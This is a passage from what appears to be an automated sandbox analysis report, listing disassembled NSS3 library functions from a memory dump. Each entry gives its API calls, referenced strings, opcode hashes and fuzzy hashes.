PL_HashTableLookup.NSS3(?,?), ref: 6D522D71
PR_Unlock.NSS3(?), ref: 6D522D7E

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

Strings

#?Rm, xrefs: 6D522C43

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?Rm
API String ID: 2446853827-125460306
Opcode ID: 24f4ac3fdbc32f3505b381fb10ec7b51e8440c744835e2a828e707c2983bceb2
Instruction ID: 34c6ec0412bdde30c5ec36a0cbbd84c53cf4a309f131e42805e79354ed200325
Opcode Fuzzy Hash: 24f4ac3fdbc32f3505b381fb10ec7b51e8440c744835e2a828e707c2983bceb2
Instruction Fuzzy Hash: 01518CBAC04105ABEB00DF24DC4196AB778FF55348F058924ED1997A12F731ED64CBE1

Function 6D57AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D57ADB1

Part of subcall function 6D55BE30: SECOID_FindOID_Util.NSS3(6D51311B,00000000,?,6D51311B,?), ref: 6D55BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6D57ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D57AE08

Part of subcall function 6D55B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D6318D0,?), ref: 6D55B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D57AE25
PL_FreeArenaPool.NSS3 ref: 6D57AE63
PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D57AE4D

Part of subcall function 6D484C70: TlsGetValue.KERNEL32(?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484C97
Part of subcall function 6D484C70: EnterCriticalSection.KERNEL32(?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CB0
Part of subcall function 6D484C70: PR_Unlock.NSS3(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D57AE93
PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D57AECC
PL_FreeArenaPool.NSS3 ref: 6D57AEDE
PL_FinishArenaPool.NSS3 ref: 6D57AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D57AEF5
PL_FinishArenaPool.NSS3 ref: 6D57AF16

Strings

security, xrefs: 6D57ADEE

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 3944694d55a3ba4b3b8ab8eff6d2073246386c793645d4f1908ef69f7ee8d2d5
Instruction ID: ced5ee919abe3e9a8cd251cdbe92dee7a812f52eed6790c2e9d52c266977141b
Opcode Fuzzy Hash: 3944694d55a3ba4b3b8ab8eff6d2073246386c793645d4f1908ef69f7ee8d2d5
Instruction Fuzzy Hash: 824128B5808351A7FB399B18DC45F7B32A8AF86309F210925ED1892A42FB35D914C7E3

Function 6D61AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D5C9890: TlsGetValue.KERNEL32(?,?,?,6D5C97EB), ref: 6D5C989E

EnterCriticalSection.KERNEL32(?), ref: 6D61AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6D61AFCE
PR_SetPollableEvent.NSS3(?), ref: 6D61AFD9
EnterCriticalSection.KERNEL32(?), ref: 6D61AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6D61B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6D61B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6D61B070
PR_JoinThread.NSS3(?), ref: 6D61B07B
free.MOZGLUE(?), ref: 6D61B084
EnterCriticalSection.KERNEL32(?), ref: 6D61B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6D61B0C4
PR_JoinThread.NSS3(?), ref: 6D61B0F3
free.MOZGLUE(?), ref: 6D61B0FC
PR_JoinThread.NSS3(?), ref: 6D61B137
free.MOZGLUE(?), ref: 6D61B140

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 23caee19e202089494e42770e25688abc005c9cc6f1542b1f9bd20c11d202d03
Instruction ID: 499af95d758a45b0470b974c6d57bfd6472ddf93313959d457a935ea714162c4
Opcode Fuzzy Hash: 23caee19e202089494e42770e25688abc005c9cc6f1542b1f9bd20c11d202d03
Instruction Fuzzy Hash: 0C913BB5904602DFCB14CF18C880956BBF1BF8A31972685ADD9195B722E732FD46CF81

Function 6D522980 Relevance: 22.7, APIs: 15, Instructions: 217COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6D509E71,?,?,6D51F03D), ref: 6D5229A2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D509E71,?), ref: 6D5229B6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6D509E71,?,?,6D51F03D), ref: 6D5229E2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D509E71,?), ref: 6D5229F6
PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D509E71,?), ref: 6D522A06
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D509E71), ref: 6D522A13

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

PR_Unlock.NSS3(?), ref: 6D522A6A
TlsGetValue.KERNEL32 ref: 6D522A98
EnterCriticalSection.KERNEL32(?), ref: 6D522AAC
PL_HashTableLookup.NSS3(?,?), ref: 6D522ABC
PR_Unlock.NSS3(?), ref: 6D522AC9
TlsGetValue.KERNEL32 ref: 6D522B3D
EnterCriticalSection.KERNEL32(?), ref: 6D522B51
PL_HashTableLookup.NSS3(?,6D509E71), ref: 6D522B61
PR_Unlock.NSS3(?), ref: 6D522B6E

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$CriticalSection$EnterUnlock$HashLookupTable$calloc$Leave
String ID:
API String ID: 2204204336-0
Opcode ID: 95d4f6bdd59db226e7285e2b35a9651e5bee63562bc092a41209d7ce93931025
Instruction ID: a2197ba9fab0d65dea00c5c2c4ce0eb8999b6d83ad311bfe2fff98f7154f8d1c
Opcode Fuzzy Hash: 95d4f6bdd59db226e7285e2b35a9651e5bee63562bc092a41209d7ce93931025
Instruction Fuzzy Hash: B771457AC14201ABEF25DF24DC4096A7B78FF55354B098924ED288BA12EB31ED94CBD1

Function 6D595CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6D592BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6D592A28,00000060,00000001), ref: 6D592BF0
Part of subcall function 6D592BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6D592A28,00000060,00000001), ref: 6D592C07
Part of subcall function 6D592BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6D592A28,00000060,00000001), ref: 6D592C1E
Part of subcall function 6D592BE0: free.MOZGLUE(?,00000000,00000000,?,6D592A28,00000060,00000001), ref: 6D592C4A

free.MOZGLUE(?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595D0F
free.MOZGLUE(?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595D4E
free.MOZGLUE(?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595D62
free.MOZGLUE(?,?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595D85
free.MOZGLUE(?,?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595D99
free.MOZGLUE(?,?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6D595E3E
free.MOZGLUE(?,?,?,?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6D595E47
free.MOZGLUE(?,?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D595E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6D59AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6D595E78
free.MOZGLUE(?,?,?,?,?,?,?,6D59AAD4), ref: 6D595EB9
free.MOZGLUE(?,?,?,?,?,?,?,6D59AAD4), ref: 6D595EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6D59AAD4), ref: 6D595F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6D59AAD4), ref: 6D595F4B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 46c577c340e41315cb9b3f43a22f1cb7e10a492fc808be402a9216b4676bad21
Instruction ID: bcf8f1a03477e6b95185344337e844fb48fdf9428ba49b1f55eea68befca528e
Opcode Fuzzy Hash: 46c577c340e41315cb9b3f43a22f1cb7e10a492fc808be402a9216b4676bad21
Instruction Fuzzy Hash: 6271A0B4904B419FD714CF20D884AA2B7B5BF89309F058929E81F8B711EB32F965CB91

Function 6D518DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6D518E22
EnterCriticalSection.KERNEL32(?), ref: 6D518E36
memset.VCRUNTIME140(?,00000000,?), ref: 6D518E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6D518E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6D518E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6D518EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6D518EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6D518EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6D518F00
free.MOZGLUE(?), ref: 6D518F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6D518F39
memset.VCRUNTIME140(?,00000000,?), ref: 6D518F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6D518F5B
PR_Unlock.NSS3(?), ref: 6D518F72
PR_Unlock.NSS3(?), ref: 6D518F82

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 0afeccfb71ac2c82f0ffc99aefbbf8255f6b07016fec38a7d3d601610fdcef29
Instruction ID: 9bdf9add58c8472daa91ff4dc7af82ddbf7a4b29b16c586f371907b7d9f9eafd
Opcode Fuzzy Hash: 0afeccfb71ac2c82f0ffc99aefbbf8255f6b07016fec38a7d3d601610fdcef29
Instruction Fuzzy Hash: B35107B2D08212AFF714DF68CC8496ABBB9FF85314B158628EC0897600E731ED41C7E2

Function 6D610FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6D611000

Part of subcall function 6D5C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6D4F1A48), ref: 6D5C9BB3
Part of subcall function 6D5C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6D4F1A48), ref: 6D5C9BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6D611016

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

PR_Unlock.NSS3(?), ref: 6D611021

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6D611046
PR_Unlock.NSS3(?), ref: 6D61106B
PR_Lock.NSS3 ref: 6D611079
PR_Unlock.NSS3 ref: 6D611096
free.MOZGLUE(?), ref: 6D6110A7
free.MOZGLUE(?), ref: 6D6110B4
PR_DestroyCondVar.NSS3(?), ref: 6D6110BF
PR_DestroyCondVar.NSS3(?), ref: 6D6110CA
PR_DestroyCondVar.NSS3(?), ref: 6D6110D5
PR_DestroyCondVar.NSS3(?), ref: 6D6110E0
PR_DestroyLock.NSS3(?), ref: 6D6110EB
free.MOZGLUE(?), ref: 6D611105

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: a7d413b96088b2bd937af5c3b48bac11f64b58fb4b147e614932a04df37deb4b
Instruction ID: 15ee0353a16b6a28727d419878544b81fe8fa112d81187a37b7f185d5e2f52a2
Opcode Fuzzy Hash: a7d413b96088b2bd937af5c3b48bac11f64b58fb4b147e614932a04df37deb4b
Instruction Fuzzy Hash: 2831ABB9808502AFD7019F14EC42A15BB72BF9531AB094135E90943A61EB36FD74DBC3

Function 6D48DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6D48DD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6D48DD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D48DE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6D48DEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D48DECD

Strings

database corruption, xrefs: 6D48DF77, 6D48DFE7
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D48DF6D, 6D48DFCC, 6D48DFDD
%s at line %d of [%.10s], xrefs: 6D48DF7C, 6D48DFEC

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 58df1bdbe8d97afc5fcb8430a29091ef4d65aea431674c5736013f718124bd72
Instruction ID: 3c7a21284f0fa85f8f04c92c4b69912f684c4fda03388bbc798d631cb9c9fd80
Opcode Fuzzy Hash: 58df1bdbe8d97afc5fcb8430a29091ef4d65aea431674c5736013f718124bd72
Instruction Fuzzy Hash: B0A1D071A086519FC711CF29C880E2AB7F5AFC5348F15892EE9898B743E731EC46CB91

Function 6D54EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6D54EE0B

Part of subcall function 6D560BE0: malloc.MOZGLUE(6D558D2D,?,00000000,?), ref: 6D560BF8
Part of subcall function 6D560BE0: TlsGetValue.KERNEL32(6D558D2D,?,00000000,?), ref: 6D560C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6D54EEE1

Part of subcall function 6D541D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6D541D7E
Part of subcall function 6D541D50: EnterCriticalSection.KERNEL32(?), ref: 6D541D8E
Part of subcall function 6D541D50: PR_Unlock.NSS3(?), ref: 6D541DD3

TlsGetValue.KERNEL32 ref: 6D54EE51
EnterCriticalSection.KERNEL32(?), ref: 6D54EE65
PR_Unlock.NSS3(?), ref: 6D54EEA2
free.MOZGLUE(?), ref: 6D54EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6D54EED0
PR_Unlock.NSS3(?), ref: 6D54EF48
free.MOZGLUE(?), ref: 6D54EF68
PR_SetError.NSS3(00000000,00000000), ref: 6D54EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6D54EFA4
free.MOZGLUE(?), ref: 6D54EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6D54F055
free.MOZGLUE(?), ref: 6D54F060

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: cf5da4be812450ca7acb32725e67ac09e1534f4ae40db18f1637a219ea481b8d
Instruction ID: 05db6eb1a692426d4d0c6825ab2adfcb10731b250c391cfdd4d7e60b5d7ab480
Opcode Fuzzy Hash: cf5da4be812450ca7acb32725e67ac09e1534f4ae40db18f1637a219ea481b8d
Instruction Fuzzy Hash: C2818175A00209AFDF05DFA5DC85BAE7BB5BF48304F058424EE09A3611E731E960CBA2

Function 6D514CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6D514D80
PORT_Alloc_Util.NSS3(00000000), ref: 6D514D95
PORT_NewArena_Util.NSS3(00000800), ref: 6D514DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D514E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6D514E43
PORT_NewArena_Util.NSS3(00000800), ref: 6D514E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6D514E85
DER_Encode_Util.NSS3(?,?,6D6605A4,00000000), ref: 6D514EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6D514F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6D514F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D514F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6D514F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D514F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D514FC8

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: ef2acb82c38224baa8a570abf731dd0bf8eb1837e063c23b21d80ad7bf36a9f6
Instruction ID: cb43b421a9f10cd0379d42ca7e04b77251079005ab91221cce97fc08af1125ed
Opcode Fuzzy Hash: ef2acb82c38224baa8a570abf731dd0bf8eb1837e063c23b21d80ad7bf36a9f6
Instruction Fuzzy Hash: 8F818D7190C302AFE704CF29DC80B6AB7E4AB88358F05992DF958DB741E731E904CB92

Function 6D555C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6D555C9B
